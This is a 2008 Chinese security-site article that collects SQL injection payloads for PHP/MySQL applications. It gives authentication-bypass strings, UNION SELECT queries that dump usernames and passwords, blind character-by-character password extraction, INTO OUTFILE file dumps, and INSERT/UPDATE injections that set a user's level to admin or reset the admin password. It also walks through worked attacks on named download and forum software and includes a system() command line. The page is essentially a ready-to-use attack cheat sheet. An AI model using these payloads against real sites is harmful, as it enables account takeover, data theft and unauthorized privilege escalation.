频道栏目
首页 > 安全 > 网站安全 > 正文

PHP注入技术语句

2008-06-12 05:08:51      个评论      
收藏   我要投稿

or 1=1

/*

%23

and password=mypass

id=-1 union select 1,1,1

id=-1 union select char(97),char(97),char(97)

id=1 union select 1,1,1 from members

id=1 union select 1,1,1 from admin

id=1 union select 1,1,1 from user

userid=1 and password=mypass

userid=1 and mid(password,3,1)=char(112)

userid=1 and mid(password,4,1)=char(97)

and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的)

and LENGTH(password)=6(探测密码长度)

and LEFT(password,1)=m

and LEFT(password,2)=my

…………………………依次类推

union select 1,username,password from user/*

union select 1,username,password from user/*

= union select 1,username,password from user/* (可以是1或者=后直接跟)

99999 union select 1,username,password from user/*

into outfile c:/file.txt (导出文件)

= or 1=1 into outfile c:/file.txt

1 union select 1,username,password from user into outfile c:/user.txt

select password FROM admins where login=John INTO DUMPFILE /path/to/site/file.txt

id= union select 1,username,password from user into outfile

id=-1 union select 1,database(),version() (灵活应用查询)

常用查询测试语句,

select * FROM table where 1=1

select * FROM table where uuu=uuu

select * FROM table where 1<>2

select * FROM table where 3>2

select * FROM table where 2<3

select * FROM table where 1

select * FROM table where 1+1

select * FROM table where 1--1

select * FROM table where ISNULL(NULL)

select * FROM table where ISNULL(COT(0))

select * FROM table where 1 IS NOT NULL

select * FROM table where NULL IS NULL

select * FROM table where 2 BETWEEN 1 AND 3

select * FROM table where b BETWEEN a AND c

select * FROM table where 2 IN (0,1,2)

select * FROM table where CASE WHEN 1>0 THEN 1 END

例如:夜猫下载系统1.0版本

id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1

union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)

union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51

…………………………………………………………

例如2:灰色轨迹 变换id进行测试(meteor)

union%20(select%20allowsmilies,public,userid,0000-0-0,user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate

union%20(select%20allowsmilies,public,userid,0000-0-0,pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate

构造语句:

select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)

select allowsmilies,public,userid,eventdate,event,subject FROM calendar_events where eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)

union%20(select%201,0,2,1999-01-01,a,password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate

union%20(select%201,0,12695,1999-01-01,a,password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate

union%20(select%201,0,12695,1999-01-01,a,userid%20FROM%20user%20where%20username=sandflee)%20order%20by%20eventdate (查沙子的id)

(select a FROM table_name where a=10 AND B=1 orDER BY a LIMIT 10)

select * FROM article where articleid=$id union select * FROM……(字段和数据库相同情况下,可直接提交)

select * FROM article where articleid=$id union select 1,1,1,1,1,1,1 FROM……(不同的情况下)

特殊技巧:在表单,搜索引擎等地方写:

"___"

".__ "

"%

% orDER BY articleid/*

% orDER BY articleid#

__ orDER BY articleid/*

__ orDER BY articleid#

$command = "dir c:";system($command);

select * FROM article where articleid=$id

select * FROM article where articleid=$id

1 and 1=2 union select * from user where userid=1/* 句中变为

(select * FROM article where articleid=1 and 1=2 union select * from user where userid=1/*)

1 and 1=2 union select * from user where userid=1

语句形式:建立一个库,插入:

create DATABASE `injection`

create TABLE `user` (

`userid` int(11) NOT NULL auto_increment,

`username` varchar(20) NOT NULL default ,

`password` varchar(20) NOT NULL default ,

PRIMARY KEY (`userid`)

) ;

insert INTO `user` VALUES (1, swap, mypass);

插如一个注册用户:

insert INTO `user` (userid, username, password, homepage, userlevel) VALUES (, $username, $password, $homepage, 1);

"insert INTO membres (login,password,nom,email,userlevel) VALUES ($login,$pass,$nom,$email,1)";

insert INTO membres (login,password,nom,email,userlevel) VALUES (,,,,3)#,1)

"insert INTO membres SET login=$login,password=$pass,nom=$nom,email=$email";

insert INTO membres SET login=,password=,nom=,userlevel=3,email=

"insert INTO membres VALUES ($id,$login,$pass,$nom,$email,1)";

update user SET password=$password, homepage=$homepage where id=$id

update user SET password=MD5(mypass) where username=admin#), homepage=$homepage where id=$id

"update membres SET password=$pass,nom=$nom,email=$email where id=$id";

update membres SET password=[PASS],nom=,userlevel=3,email= where id=[ID]

"update news SET Votes=Votes+1, score=score+$note where idnews=$id";

长用函数:

DATABASE()

USER()

SYSTEM_USER()

SESSION_USER()

CURRENT_USER()

比如:

update article SET title=$title where articleid=1 对应函数

update article SET title=DATABASE() where id=1

#把当前数据库名更新到title字段

update article SET title=USER() where id=1

#把当前 MySQL 用户名更新到title字段

update article SET title=SYSTEM_USER() where id=1

#把当前 MySQL 用户名更新到title字段

update article SET title=SESSION_USER() where id=1

#把当前 MySQL 用户名更新到title字段

update article SET title=CURRENT_USER() where id=1

#把当前会话被验证匹配的用户名更新到title字段

:::::::::::::::::::::::::::::::::::::::::::::::::
$req = "select * FROM membres where name like %$search% orDER BY name";

select * FROM membres where name like %% orDER BY uid#% orDER BY name

select * FROM membres where name like %% orDER BY uid#% orDER BY name

select uid FROM admins where login= or a=a AND password= or a=a (经典)

select uid FROM admins where login= or admin_level=1# AND password=

select * FROM table where msg like %hop

select uid FROM membres where login=Bob AND password like a%# AND password=

select * FROM membres where name like %% orDER BY uid#% orDER BY na

相关TAG标签 语句 技术
上一篇:来自微软专家的SQL注入防范方法
下一篇:ASP+acc手工注入折叠展开
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站